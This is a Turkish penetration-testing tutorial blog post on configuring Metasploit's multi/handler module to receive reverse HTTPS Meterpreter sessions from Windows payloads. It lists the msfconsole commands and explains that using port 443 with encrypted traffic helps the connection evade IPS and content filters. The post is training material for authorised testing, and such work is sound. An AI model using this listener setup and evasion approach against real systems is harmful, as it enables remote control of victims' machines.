MSF multi-handler İstismar Modülü ve Gelen Ters HTTPS Meterpreter Bağlantı Taleplerinin Yakalanması

Sızma testlerindeki önemli adımlardan birisi hedef sistem üzerinde yetkili erişim sağlayacak bir Payload elde edebilmektir. Hazırlanan uygulamalar beklendiği gibi çalışırsa, saldırgana ait makineye bir bağlantı talebi gelir. Bu yazıda saldırgan makinesine gelen talepleri yakalamak için kullanılan MSF multi-handler istismar modülü incelenecektir.

Bu yazıda windows/meterpreter/reverse_https şeklinde oluşturulan bir Payload tarafından gelen talep exploit/multi/handler istismar modülü tarafından yakalanacaktır. Ters HTTPS Meterpreter bağlantısının seçilmesinin sebepleri aşağıdaki gibi sıralanabilir:

  • Son kullanıcılar tarafından en çok kullanılan işletim sistemi Windows işletim sistemidir. Bu sebeple Windows için payload türü seçilir.
  • Sızma testlerinde, en çok kullanılan payload türü – Metasploit Framework tarafından sağlanan bir çok yeteneğe sahip olan – Meterpreter kabuğudur. Bu sebeple Meterpreter bağlantısı tercih edilmiştir.
  • Kurumlar ağlarını çeşitli alt ağlara bölerler. DMZ adı verilen ağlarda web sunucusu veya mail sunucusu gibi internet ortamına açılan sistemler bulunur. Bu sistemlere doğru belli portlar açıktır. Bunun yanında, istemcilerin (personelin kullandığı bilgisayarların) bulunduğu ağlara internet ortamından direk erişim sağlanamaz. Ancak, istemci ve sunuculardan dışarıya genellikle 80. ve 443. portlar açılır. Böylece, HTTP ve HTPPS üzerinden hizmet veren sistemlere kurum içindeki personel erişim sağlamış olur. Eğer Ters HTTPS bağlantısı gerçekleştiren bir payload kullanırsa, hem TCP 443. porttan internet ortamındaki saldırgan bilgisayarına erişim sağlanmış olur, hem de şifreli trafik olduğu için (SSL inspection yapılmıyorsa) aradaki koruyucu cihazlar (IPS, İçerik Filtreleyici gibi) tarafından tespit edilmemiş olur. Bu sebeple, sızma testleri (özellikle sosyal mühendislik sızma testleri) sırasında TCP 443. porttan ters HTTPS bağlantısı kuran payload modülleri tercih edilir.

Modülün seçimi ve kullanımı aşağıdaki gibidir:

search name:handler type:exploit
use exploit/multi/handler
show options

handling-connections-with-msf-multi-handler-exploit-module-01

Modülün ayarlanması aşağıdaki gibidir:

set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.244.148
set LPORT 443
set VERBOSE false
set ExitOnSession false
show options

handling-connections-with-msf-multi-handler-exploit-module-02

Kullanılan “ExitOnSession” seçeneğinin “false” olarak ayarlanması ile birden fazla talebin yakalanabilmesi sağlanarak, Meterpreter kabuğuna otomatik olarak düşülmesinin önüne geçilir. Kullanılabilecek diğer önemli seçenekler SessionCommunicationTimeout, SessionExpirationTimeout, AutoRunScript olarak sıralanabilir.

Modül başlatılır:

exploit -j -z

handling-connections-with-msf-multi-handler-exploit-module-03

Payload çalıştığında, bağlantı MSF multi-handler tarafından yakalanmış olur.

handling-connections-with-msf-multi-handler-exploit-module-04

Payload özelliğine göre oturum elde edilmiştir.

sessions

handling-connections-with-msf-multi-handler-exploit-module-05

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.